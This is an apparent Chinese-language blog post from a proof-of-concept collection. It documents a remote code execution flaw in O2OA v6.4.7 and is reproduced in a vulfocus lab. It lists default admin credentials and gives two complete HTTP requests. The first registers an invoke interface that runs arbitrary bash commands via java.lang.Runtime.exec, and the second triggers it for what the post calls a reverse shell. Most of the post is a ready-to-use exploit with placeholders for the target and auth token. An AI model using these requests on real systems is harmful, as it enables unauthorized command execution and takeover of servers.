Pages

Menu

Babing
Published on 2024-08-30 / 3 Visits
0
0

O7-1O2OA-RCE

#Pocs

O7-1O2OA-RCE

漏洞描述:

O2OA是一个基于 J2EE 分布式架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本,基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。通过/x_program_center/jaxrs/invoke 发现 020A v6.4.7 包含一个远程代码执行(RCE)漏洞。

影响版本:

   020A v6.4.7

网络测绘:

fofa语法:

漏洞复现:

vulfocus在线靶场环境
image-20240619150133710

5、利用流程

1、使用默认口令xadmin/o2登录后台,利用某大佬写的POC进行复现
项目地址:O2OA-POC/POC.md at main · wendell1224/O2OA-POC · GitHub
注意事项:大佬的POC里面应该是打错了,多打了一个 " / " ,所以导致添加的接口无法调用指令,删掉即可。
image-20240619150144255
bp抓包收集 Authorization字段信息
image-20240619150157699io=1.5&rotation=0&showTitle=false&status=done&style=none&taskId=u73c05518-adfb-4c3a-bf19-d9e252e763f&title=)
添加一个接口
image-20240619150221285
payload:

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: [your target host]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: [your authorization]
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475

{"name":"abc","id":"abc","alias":"","description":"","isNewInvoke":true,"text":"\n\nvar s = [3];\ns[0] = \"/bin/bash\";\ns[1] = \"-c\";\ns[2] = \"[command]\";\nvar p = java.lang.Runtime.getRuntime().exec(s);\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}

效果图:
2、调用接口中的命令反弹shell
!image-20240619150234935

POST /x_program_center/jaxrs/invoke/abc/execute?v=6.3 HTTP/1.1
Host: [your target host]
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: [your authorization]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://[your target host]
Referer: http://[your target host]/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie: 
Connection: close
O8-1OpenMetadata-RCE
O6-1Oracle-E-Busi...

Comment